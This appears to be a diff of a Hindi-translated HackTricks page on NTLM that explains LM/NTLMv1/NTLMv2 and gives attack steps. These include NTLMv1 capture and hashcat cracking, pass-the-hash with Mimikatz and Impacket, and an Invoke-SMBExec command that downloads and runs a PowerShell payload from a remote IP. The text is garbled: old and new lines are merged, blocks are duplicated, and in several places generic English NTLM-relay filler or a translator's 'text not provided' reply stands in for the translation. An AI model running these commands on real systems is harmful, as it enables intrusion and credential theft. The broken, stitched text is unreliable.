* **hacktricks repo में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें** और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>
## मूल जानकारी ## मूल जानकारी
**NTLM Credentials**: डोमेन नाम (यदि कोई हो), उपयोगकर्ता नाम और पासवर्ड हैश. **NTLM Credentials**: डोमेन नाम (यदि कोई है), उपयोगकर्ता नाम और पासवर्ड हैश।
**LM** केवल **Windows XP और सर्वर 2003** में **सक्षम** है (LM हैशेज को क्रैक किया जा सकता है). LM हैश AAD3B435B51404EEAAD3B435B51404EE का मतलब है कि LM का उपयोग नहीं किया जा रहा है (यह खाली स्ट्रिंग का LM हैश है). **LM** केवल **Windows XP और सर्वर 2003** में **सक्षम** है (LM हैश को क्रैक किया जा सकता है) LM हैश AAD3B435B51404EEAAD3B435B51404EE का मतलब है कि LM का उपयोग नहीं हो रहा है (खाली स्ट्रिंग का LM हैश है)।
डिफ़ॉल्ट रूप से **Kerberos** का **उपयोग किया जाता है**, इसलिए NTLM केवल तब उपयोग किया जाएगा जब **कोई Active Directory कॉन्फ़िगर नहीं की गई हो,** **डोमेन मौजूद न हो**, **Kerberos काम नहीं कर रहा हो** (खराब कॉन्फ़िगरेशन) या **क्लाइंट** वैध होस्ट-नाम के बजाय IP का उपयोग करके कनेक्ट करने की कोशिश करता है. डिफ़ॉल्ट रूप से **Kerberos** का उपयोग होता है, इसलिए NTLM का उपयोग केवल तब होगा जब **कोई Active Directory कॉन्फ़िगर नहीं है**, **डोमेन मौजूद नहीं है**, **Kerberos काम नहीं कर रहा है** (बुरी कॉन्फ़िगरेशन) या **वालिड होस्ट-नाम की बजाय IP का उपयोग करने वाला क्लाइंट** कोनेक्ट करने की कोशिश करता है।
**NTLM प्रमाणीकरण** के **नेटवर्क पैकेट्स** में "**NTLMSSP**" **हेडर** होता है. **NTLM प्रमाणीकरण** के **नेटवर्क पैकेट** के **हेडर** में "**NTLMSSP**" होता है।
प्रोटोकॉल: LM, NTLMv1 और NTLMv2 %windir%\Windows\System32\msv1\_0.dll में समर्थित हैं प्रोटोकॉल: LM, NTLMv1 और NTLMv2 को DLL %windir%\Windows\System32\msv1\_0.dll में समर्थित किया गया है।
## LM, NTLMv1 और NTLMv2 ## LM, NTLMv1 और NTLMv2
आप जांच सकते हैं और कॉन्फ़िगर कर सकते हैं कि कौन सा प्रोटोकॉल उपयोग किया जाएगा: आप जांच और कॉन्फ़िगर कर सकते हैं कि कौन सा प्रोटोकॉल उपयोग किया जाएगा:
### GUI ### GUI
_secpol.msc_ निष्पादित करें -> स्थानीय नीतियाँ -> सुरक्षा विकल्प -> नेटवर्क सुरक्षा: LAN मैनेजर प्रमाणीकरण स्तर. यहाँ 6 स्तर हैं (0 से 5 तक). _secpol.msc_ चलाएं -> स्थानीय नीतियाँ -> सुरक्षा विकल्प -> नेटवर्क सुरक्षा: LAN प्रबंधन प्रमाणीकरण स्तर। 6 स्तर हैं (0 से 5 तक)।
![](<../../.gitbook/assets/image (92).png>) ![](<../../.gitbook/assets/image (92).png>)
@ -51,52 +51,77 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
``` ```
## बेसिक NTLM डोमेन प्रमाणीकरण योजना ## बेसिक NTLM डोमेन प्रमाणीकरण योजना
1. **उपयोगकर्ता** अपने **प्रमाण-पत्र** प्रस्तुत करता है 1. **उपयोगकर्ता** अपने **प्रमाणपत्र** प्रस्तुत करता है
2. क्लाइंट मशीन **प्रमाणीकरण अनुरोध भेजती है**, **डोमेन नाम** और **उपयोगकर्ता नाम** सहित 2. क्लाइंट मशीन **प्रमाणीकरण अनुरोध भेजती है** जिसमें **डोमेन नाम** और **उपयोगकर्ता नाम** भेजती है
3. **सर्वर** **चुनौती** भेजता है 3. **सर्वर** **चुनौती** भेजता है
4. **क्लाइंट** पासवर्ड के हैश का उपयोग करके **चुनौती को एन्क्रिप्ट** करता है और से प्रतिक्रिया के रूप में भेजता है 4. **क्लाइंट** चुनौती को **पासवर्ड के हैश का उपयोग करके एन्क्रिप्ट** करता है और से प्रतिक्रिया के रूप में भेजता है
5. **सर्वर**, **डोमेन कंट्रोलर** को **डोमेन नाम, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया** भेजता है। यदि Active Directory कॉन्फ़िगर नहीं किया गया है या डोमेन नाम सर्वर का नाम है, तो प्रमाण-पत्र **स्थानीय रूप से जांचे जाते हैं**। 5. **सर्वर** **डोमेन कंट्रोलर** को **डोमेन नाम, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया** भेजता है। यदि **सक्रिय निर्देशिका** कॉन्फ़िगर नहीं है या डोमेन नाम सर्वर का नाम है, तो प्रमाणपत्र **स्थानीय रूप से जांची जाती है**।
6. **डोमेन कंट्रोलर जांचता है कि सब कुछ सही है** और सर्वर को जानकारी भेजता है 6. **डोमेन कंट्रोलर** जांचता है कि सब कुछ सही है और सर्वर को जानकारी भेजता है
**सर्वर** और **डोमेन कंट्रोलर** **Netlogon** सर्वर के माध्यम से **सुरक्षित चैनल** बना सकते हैं क्योंकि डोमेन कंट्रोलर को सर्वर का पासवर्ड पता होता है (यह **NTDS.DIT** डेटाबेस के अंदर होता है)। **सर्वर** और **डोमेन कंट्रोलर** को **नेटलॉगन** सर्वर के माध्यम से **सुरक्षित चैनल** बनाने में सक्षम होते हैं क्योंकि डोमेन कंट्रोलर सर्वर के पासवर्ड को जानता है (यह **NTDS.DIT** डेटाबेस में है)।
### लोकल NTLM प्रमाणीकरण योजना ### स्थानीय NTLM प्रमाणीकरण योजना
प्रमाणीकरण वही है जैसा कि **पहले उल्लेखित है** लेकिन **सर्वर** को **उपयोगकर्ता के हैश** का पता होता है जो **SAM** फाइल में प्रमाणीकरण की कोशिश करता है। इसलिए, डोमेन कंट्रोलर से पूछने के बजाय, **सर्वर स्वयं जांच करेगा** कि क्या उपयोगकर्ता प्रमाणीकरण कर सकता है। प्रमाणीकरण उसी तरह है जैसा **पहले उल्लिखित** है, लेकिन **सर्वर** उस **उपयोगकर्ता के हैश को जानता है** जो **SAM** फ़ाइल में प्रमाणीकरण करने की कोशिश कर रहा है। इसलिए, डोमेन कंट्रोलर से पूछने की बजाय, **सर्वर खुद जांचेगा** कि क्या उपयोगकर्ता प्रमाणीकरण कर सकता है।
### NTLMv1 चुनौती ### NTLMv1 चुनौती
**चुनौती की लंबाई 8 बाइट्स** होती है और **प्रतिक्रिया 24 बाइट्स** लंबी होती है। **चुनौती लंबाई 8 बाइट** है और **प्रतिक्रिया 24 बाइट** लंबी है।
**हैश NT (16बाइट्स)** को **3 भागों में 7बाइट्स प्रत्येक** में विभाजित किया जाता है (7B + 7B + (2B+0x00\*5)): **अंतिम भाग को शून्य से भरा जाता है**। फिर, **चुनौती** को प्रत्येक भाग के साथ **अलग-अलग सिफर** किया जाता है और **परिणामी** सिफर किए गए बाइट्स को **जोड़ा** जाता है। कुल: 8B + 8B + 8B = 24Bytes **हैश NT (16 बाइट)** को **3 हिस्सों में विभाजित किया जाता है (प्रत्येक 7 बाइट)**: **आखिरी हिस्सा शून्यों से भरा होता है**। फिर, **चुनौती** को प्रत्येक हिस्से के साथ अलग-अलग **एन्क्रिप्ट** किया जाता है और परिणामी एन्क्रिप्टेड बाइट्स **जोड़े जाते हैं**। कुल: 8 बाइट + 8 बाइट + 8 बाइट = 24 बाइट
**समस्याएं**: **समस्याएं**:
* **रैंडमनेस की कमी** * **अनियमितता की कमी**
* 3 भागों को **अलग-अलग हमला** किया जा सकता है NT हैश पाने के लिए * 3 हिस्से अलग-अलग **हमले किए जा सकते हैं** ताकि NT हैश पता लगाया जा सके
* **DES को क्रैक किया जा सकता है** * **DES को तोड़ा जा सकता है**
* तीसरी कुंजी हमेशा **5 शून्यों** से बनी होती है। * 3 वां कुंजी हमेशा **5 शून्यों** से मिलकर बनाई जाती है।
* यदि **एक ही चुनौती** दी जाती है तो **प्रतिक्रिया** भी **वही** होगी। इसलिए, आप **चुनौती** के रूप में पीड़ित को "**1122334455667788**" का स्ट्रिंग दे सकते हैं और **पूर्वनिर्मित रेनबो टेबल्स** का उपयोग करके प्रतिक्रिया पर हमला कर सकते हैं। * **एक ही चुनौती** दिया जाएगा तो **प्रतिक्रिया** **समान** होगी। इसलिए, आप पीड़ित को **पूर्व-गणना रेनबो तालिकाओं** का उपयोग करके प्रतिक्रिया के लिए "**1122334455667788**" स्ट्रिंग को चुनौती दे सकते हैं और हमला कर सकते हैं।
### NTLMv1 हमला ### NTLMv1 हमला
आजकल Unconstrained Delegation कॉन्फ़िगर किए गए वातावरणों को पाना कम हो रहा है, लेकिन इसका यह मतलब नहीं है कि आप **Print Spooler सेवा का दुरुपयोग नहीं कर सकते** आजकल अनकंशित डेलीगेशन कॉन्फ़िगर किए गए परिवेशों को ढूंढना कम हो रहा है, लेकिन यह यह नहीं मतलब है कि आप **प्रिंट स्पूलर सेवा** का दुरुपयोग नहीं कर सकते।
आप AD पर पहले से ही हासिल किए गए कुछ प्रमाण-पत्र/सत्रों का उपयोग करके **प्रिंटर से किसी ऐसे होस्ट के खिलाफ प्रमाणीकरण करने के लिए कह सकते हैं** जो आपके नियंत्रण में हो। फिर, `metasploit auxiliary/server/capture/smb` या `responder` का उपयोग करके आप **प्रमाणीकरण चुनौती को 1122334455667788 पर सेट कर सकते हैं**, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह **NTLMv1** का उपयोग करके किया गया था तो आप इसे **क्रैक कर सकते हैं**।\ आप AD पर पहले से कुछ प्रमाणपत्र/सत्रों का दुरुपयोग करके **प्रिंटर से अनुरोध कर सकते हैं** कि वह आपके नियंत्रण के तहत किसी **होस्ट के खिलाफ प्रमाणीकरण** करें। फिर, `metasploit auxiliary/server/capture/smb` या `responder` का उपयोग करके आप **प्रमाणीकरण चुनौती को 1122334455667788** सेट कर सकते हैं, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह **NTLMv1** के उपयोग से किया गया है तो आप इसे **तोड़ सकते हैं**।\
यदि आप `responder` का उपयोग कर रहे हैं तो आप **प्रमाणीकरण को डाउनग्रेड** करने के लिए `--lm` फ्लैग का **उपयोग करने की कोशिश कर सकते हैं**।\ यदि आप `responder` का उपयोग कर रहे हैं तो आप \*\*ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण को NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_
_ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_
याद रखें कि प्रिंटर प्रमाणीकरण के दौरान कंप्यूटर खाते का उपयोग करेगा, और कंप्यूटर खाते **लंबे और यादृच्छिक पासवर्ड** का उपयोग करते हैं जिन्हें आप सामान्य **शब्दकोशों** का उपयोग करके **शायद क्रैक नहीं कर पाएंगे**। लेकिन **NTLMv1** प्रमाणीकरण **DES का उपयोग करता है** ([यहां अधिक जानकारी](./#ntlmv1-challenge)), इसलिए DES को क्रैक करने के लिए विशेष रूप से समर्पित कुछ सेवाओं का उपयोग करके आप इसे क्रैक कर पाएंगे (उदाहरण के लिए आप [https://crack.sh/](https://crack.sh) का उपयोग कर सकते हैं)। ध्यान रखें कि प्रिंटर प्रमाणीकरण के दौरान कंप्यूटर खाता का उपयोग करेगा, और कंप्यूटर खाते का उपयोग **लंबा और यादृच्छिक पासवर्ड** करते हैं जिसे आप **सामान्य शब्दकोश** का उपयोग करके **तोड़ने** के लिए **संभावना नहीं है**। लेकिन **NTLMv1** प्रमाणीकरण **DES का उपयोग करता है** ([अधिक जानकारी यहाँ](./#ntlmv1-challenge)), इसलिए कुछ विशेष रूप से DES को तोड़ने के लिए सेवाओं का उपयोग करके आप इसे तोड़ सकते हैं (आप [https://crack.sh/](https://crack.sh) का उपयोग कर सकते हैं)।
### NTLMv1 हमला hashcat के साथ ### hashcat के साथ NTLMv1 हमला
NTLMv1 को NTLMv1 Multi Tool [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) का उपयोग करके भी तोड़ा जा सकता है जो NTLMv1 संदेशों को ऐसे तरीके से प्रारूपित करता है जिसे hashcat के साथ तोड़ा जा सकता है। NTLMv1 को NTLMv1 मल्टी टूल [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) के साथ तोड़ा जा सकता है जो NTLMv1 संदेशों को एक ऐसी विधि में स्वरूपित करता है जिसे hashcat के साथ तोड़ा जा सकता है।
कमांड आज्ञा
``` ```
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788 python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
``` ```
यह नीचे दिया गया होगा: ## NTLM Relay Attack
### Introduction
In an NTLM relay attack, an attacker intercepts the NTLM authentication traffic between a client and a server, and relays it to another server to authenticate as the original client. This attack can be used to gain unauthorized access to systems and resources.
### Steps to Perform NTLM Relay Attack
1. **Set Up a Rogue Server**: The attacker sets up a rogue server to intercept NTLM authentication requests from the client.
2. **Capture NTLM Authentication Traffic**: The rogue server captures the NTLM authentication traffic between the client and the legitimate server.
3. **Relay the Authentication**: The attacker relays the captured authentication traffic to another server to authenticate as the client.
4. **Gain Unauthorized Access**: By successfully relaying the authentication, the attacker gains unauthorized access to the target system or resource.
### Mitigation Techniques
To prevent NTLM relay attacks, consider implementing the following mitigation techniques:
- **Enforce SMB Signing**: Enabling SMB signing can help prevent NTLM relay attacks by ensuring the integrity of the SMB packets.
- **Use Extended Protection for Authentication**: Implement Extended Protection for Authentication to protect against NTLM relay attacks.
- **Disable NTLM**: Consider disabling NTLM authentication in favor of more secure authentication protocols like Kerberos.
By implementing these mitigation techniques, organizations can reduce the risk of falling victim to NTLM relay attacks.
``` ```
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788'] ['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
@ -122,18 +147,38 @@ To crack with hashcat:
To Crack with crack.sh use the following token To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595 NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
``` ```
एक फाइल बनाएं जिसमें निम्नलिखित सामग्री हो: # NTLM Relay Attack
## Introduction
NTLM relay attacks are a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting NTLM authentication traffic and relaying it to other systems to gain unauthorized access.
## How it works
1. The attacker intercepts NTLM authentication traffic between a client and a server.
2. The attacker relays this traffic to another system, such as a file server or domain controller.
3. The target system processes the authentication request, believing it is coming from the original client.
4. If successful, the attacker gains unauthorized access to the target system using the compromised credentials.
## Mitigation
To mitigate NTLM relay attacks, consider implementing the following measures:
- Disable NTLM authentication in favor of more secure protocols like Kerberos.
- Enable SMB signing to prevent tampering with authentication traffic.
- Implement network segmentation to limit the scope of potential relay attacks.
- Regularly monitor and analyze network traffic for suspicious activity.
By following these best practices, organizations can reduce the risk of falling victim to NTLM relay attacks.
``` ```
727B4E35F947129E:1122334455667788 727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788 A52B9CDEDAE86934:1122334455667788
``` ```
``` अगर आपके पास हैशटोपोलिस जैसे टूल के माध्यम से वितरित हैशकैट को चलाएं, यह अन्यथा कई दिन ले सकता है।
hashcat को चलाएं (hashtopolis जैसे उपकरण के माध्यम से वितरित करना सबसे अच्छा है) क्योंकि अन्यथा इसमें कई दिन लगेंगे।
```
``` ```
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1 ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
``` ```
इस मामले में हम जानते हैं कि इसका पासवर्ड password है इसलिए हम डेमो के उद्देश्य से चीट करने वाले हैं: इस मामले में हमें इसका पासवर्ड पता है कि 'password' है, इसलिए हम डेमो के उद्देश्यों के लिए धोखा देंगे:
``` ```
python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926 DESKEY1: b55d6d04e67926
@ -142,7 +187,7 @@ DESKEY2: bcba83e6895b9d
echo b55d6d04e67926>>des.cand echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand echo bcba83e6895b9d>>des.cand
``` ```
हमें अब hashcat-utilities का उपयोग करके क्रैक किए गए des keys को NTLM हैश के हिस्सों में परिवर्तित करने की आवश्यकता है: हमें अब hashcat-utilities का उपयोग करना होगा ताकि क्रैक किए गए des कुंजी को NTLM हैश के हिस्सों में बदला जा सके:
``` ```
./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753 ./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1 b4b9b02e6f09a9 # this is part 1
@ -150,123 +195,145 @@ b4b9b02e6f09a9 # this is part 1
./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d ./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2 bd760f388b6700 # this is part 2
``` ```
Since the provided text is not visible, I'm unable to translate it. Please provide the text you want to be translated into Hindi, and I'll be happy to assist you. ## NTLM
### Overview
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used for authentication in Windows environments.
### NTLM Relay Attack
NTLM relay attack is a type of attack where an attacker captures the NTLM authentication request sent by a victim and relays it to a target server to gain unauthorized access. This attack can be mitigated by implementing security measures such as SMB signing, Extended Protection for Authentication, and LDAP signing.
### Protection
To protect against NTLM relay attacks, it is recommended to disable NTLM authentication in favor of more secure protocols like Kerberos. Additionally, enabling SMB signing, Extended Protection for Authentication, and LDAP signing can help prevent these attacks.
``` ```
./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788 ./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
586c # this is the last part 586c # this is the last part
``` ```
To provide an accurate translation, I need the specific English text from the file `windows-hardening/ntlm/README.md` that you want to be translated into Hindi. Please provide the text, and I will translate it for you while maintaining the markdown and HTML syntax. ## NTLM
### Overview
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used in Windows environments for authentication purposes.
### NTLM Hashes
NTLM hashes are generated by hashing the user's password. These hashes can be used in various hacking techniques, such as pass-the-hash attacks, to gain unauthorized access to systems.
### Protecting Against NTLM Attacks
To protect against NTLM attacks, it is recommended to use stronger authentication methods such as Kerberos, enable SMB signing, and disable the use of NTLM where possible. Additionally, regularly changing passwords and monitoring for any suspicious activity can help mitigate the risk of NTLM attacks.
``` ```
NTHASH=b4b9b02e6f09a9bd760f388b6700586c NTHASH=b4b9b02e6f09a9bd760f388b6700586c
``` ```
### NTLMv2 चैलेंज ### NTLMv2 Challenge
**चैलेंज की लंबाई 8 बाइट्स है** और **2 प्रतिक्रियाएं भेजी जाती हैं**: एक **24 बाइट्स** लंबी होती है और **दूसरी** की लंबाई **परिवर्तनशील** होती है। **चुनौती की लंबाई 8 बाइट है** और **2 प्रतिक्रियाएँ भेजी जाती हैं**: एक **24 बाइट** लंबी है और **दूसरी** की लंबाई **विविध** है।
**पहली प्रतिक्रिया** **HMAC\_MD5** का उपयोग करके **स्ट्रिंग** को एन्क्रिप्ट करके बनाई जाती है जो **क्लाइंट और डोमेन** द्वारा बनाई गई होती है और **की** के रूप में **NT हैश** का **MD4 हैश** उपयोग किया जाता है। फिर, **परिणाम** को **की** के रूप में उपयोग करके **HMAC\_MD5** का उपयोग करके **चैलेंज** को एन्क्रिप्ट किया जाएगा। इसमें, **8 बाइट्स का एक क्लाइंट चैलेंज जोड़ा जाएगा**। कुल: 24 B। **पहली प्रतिक्रिया** को **HMAC\_MD5** का उपयोग करके बनाया जाता है, **client और domain** द्वारा गठित **स्ट्रिंग** को और **कुंजी** के रूप में **NT hash** के **हैश MD4** का उपयोग करके। फिर, **परिणाम** को **कुंजी** के रूप में उपयोग करके **HMAC\_MD5** का उपयोग करके **चुनौती** को गूंथने के लिए किया जाएगा। इसके लिए, **8 बाइट का एक client challenge जोड़ा जाएगा**। कुल: 24 B।
**दूसरी प्रतिक्रिया** **कई मानों** का उपयोग करके बनाई जाती है (एक नया क्लाइंट चैलेंज, एक **टाइमस्टैम्प** **रिप्ले अटैक्स** से बचने के लिए...) **दूसरी प्रतिक्रिया** को उपयोग करके बनाया जाता है **कई मान** (एक नया client challenge, **replay attacks** से बचने के लिए एक **टाइमस्टैम्प**...)
यदि आपके पास एक **pcap है जिसमें सफल प्रमाणीकरण प्रक्रिया को कैप्चर किया गया है**, तो आप इस गाइड का पालन करके डोमेन, उपयोगकर्ता नाम, चैलेंज और प्रतिक्रिया प्राप्त कर सकते हैं और पासवर्ड को क्रैक करने की कोशिश कर सकते हैं: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/) यदि आपके पास एक **pcap है जिसने एक सफल प्रमाणीकरण प्रक्रिया को कैप्चर किया है**, तो आप इस गाइड का पालन करके डोमेन, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया प्राप्त कर सकते हैं और पासवर्ड को तोड़ने का प्रयास कर सकते हैं: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/)
## Pass-the-Hash ## Pass-the-Hash
**एक बार जब आपके पास पीड़ित का हैश हो**, तो आप इसका उपयोग उसकी नकल करने के लिए कर सकते हैं।\ **जब आपके पास पीड़ित का हैश होता है**, तो आप इसका उपयोग **अनुकरण** करने के लिए कर सकते हैं।\
आपको एक **टूल** का उपयोग करना होगा जो **NTLM प्रमाणीकरण को उस हैश का उपयोग करके प्रदर्शन करेगा**, **या** आप एक नया **sessionlogon** बना सकते हैं और उस **हैश** को **LSASS** के अंदर **इंजेक्ट** कर सकते हैं, ताकि जब भी कोई **NTLM प्रमाणीकरण किया जाता है**, वह **हैश उपयोग किया जाएगा।** आखिरी विकल्प वह है जो mimikatz करता है। आपको एक **उपकरण** का उपयोग करना होगा जो **उस हैश का उपयोग करके NTLM प्रमाणीकरण करेगा**, **या** आप एक नया **सत्रलॉगऑन** बना सकते हैं और उस हैश को **LSASS** में इंजेक्ट कर सकते हैं, ताकि जब भी कोई **NTLM प्रमाणीकरण किया जाता है**, तो उस हैश का उपयोग किया जाएगा। आखिरी विकल्प है जिसे mimikatz करता है।
**कृपया, याद रखें कि आप Pass-the-Hash हमले कंप्यूटर खातों का उपयोग करके भी कर सकते हैं।** **कृपया ध्यान दें कि आप कंप्यूटर खातों का उपयोग करके भी Pass-the-Hash हमले कर सकते हैं।**
### **Mimikatz** ### **Mimikatz**
**इसे एडमिनिस्ट्रेटर के रूप में चलाने की आवश्यकता है** **व्यवस्थापक के रूप में चलाने की आवश्यकता है**
```bash ```bash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"' Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
``` ```
```markdown यह एक प्रक्रिया को शुरू करेगा जो उन उपयोगकर्ताओं के नाम पर होगी जिन्होंने मिमीकैट्ज लॉन्च किया है, लेकिन LSASS में सहेजे गए क्रेडेंशियल्स मिमीकैट्ज पैरामीटर्स के अंदर होंगे। फिर, आप नेटवर्क संसाधनों तक पहुंच सकते हैं जैसे कि आप उस उपयोगकर्ता हो (जैसे `runas /netonly` ट्रिक लेकिन आपको plain-text पासवर्ड को जानने की आवश्यकता नहीं है)।
यह एक प्रक्रिया शुरू करेगा जो उन उपयोगकर्ताओं के अंतर्गत आती है जिन्होंने mimikatz लॉन्च किया है, लेकिन LSASS में इंटरनली सहेजे गए क्रेडेंशियल्स वे होते हैं जो mimikatz पैरामीटर्स के अंदर होते हैं। फिर, आप नेटवर्क संसाधनों तक पहुँच सकते हैं जैसे कि आप वह उपयोगकर्ता हों (runas /netonly ट्रिक के समान लेकिन आपको प्लेन-टेक्स्ट पासवर्ड जानने की आवश्यकता नहीं है)।
### लिनक्स से Pass-the-Hash ### लिनक्स से पास-द-हैश
आप लिनक्स से Pass-the-Hash का उपयोग करके Windows मशीनों में कोड निष्पादन प्राप्त कर सकते हैं।\ आप लिनक्स से पास-द-हैश का उपयोग करके Windows मशीनों में कोड निष्पादन प्राप्त कर सकते हैं।\
[**यहाँ जानें कि यह कैसे करें।**](../../windows/ntlm/broken-reference/) [**यहाँ पहुंचें और इसे कैसे करें जानें।**](../../windows/ntlm/broken-reference/)
### Impacket Windows संकलित उपकरण ### Impacket Windows कंपाइल किए गए उपकरण
आप[ यहाँ से Windows के लिए impacket बाइनरीज़ डाउनलोड कर सकते हैं](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries)। आप यहाँ से [Windows के लिए Impacket बाइनरी डाउनलोड कर सकते हैं](https://github.com/ropnop/impacket\_static\_binaries/releases/tag/0.9.21-dev-binaries)।
* **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local` * **psexec\_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
* **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local` * **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
* **atexec.exe** (इस मामले में आपको एक कमांड निर्दिष्ट करने की आवश्यकता है, cmd.exe और powershell.exe इंटरैक्टिव शेल प्राप्त करने के लिए मान्य नहीं हैं)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'` * **atexec.exe** (इस मामले में आपको एक कमांड निर्दिष्ट करने की आवश्यकता है, cmd.exe और powershell.exe एक इंटरैक्टिव शैली प्राप्त करने के लिए मान्य नहीं हैं) `C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
* Impacket बाइनरीज़ के कई और भी हैं... * और कई और Impacket बाइनरी हैं...
### Invoke-TheHash ### Invoke-TheHash
आप यहाँ से powershell स्क्रिप्ट्स प्राप्त कर सकते हैं: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) आप यहाँ से पावरशेल स्क्रिप्ट प्राप्त कर सकते हैं: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
#### Invoke-SMBExec #### Invoke-SMBExec
``` ```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
```
#### इन्वोक-डब्ल्यूएमआईइक्जेक्यूट
``` ```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
``` ```
#### Invoke-WMIExec #### इनवोक-एसएमबीक्लाइंट
```
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
```
#### Invoke-SMBClient
``` ```
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
``` ```
#### Invoke-SMBEnum का प्रयोग #### इनवोक-एसएमबीईनुम
``` ```
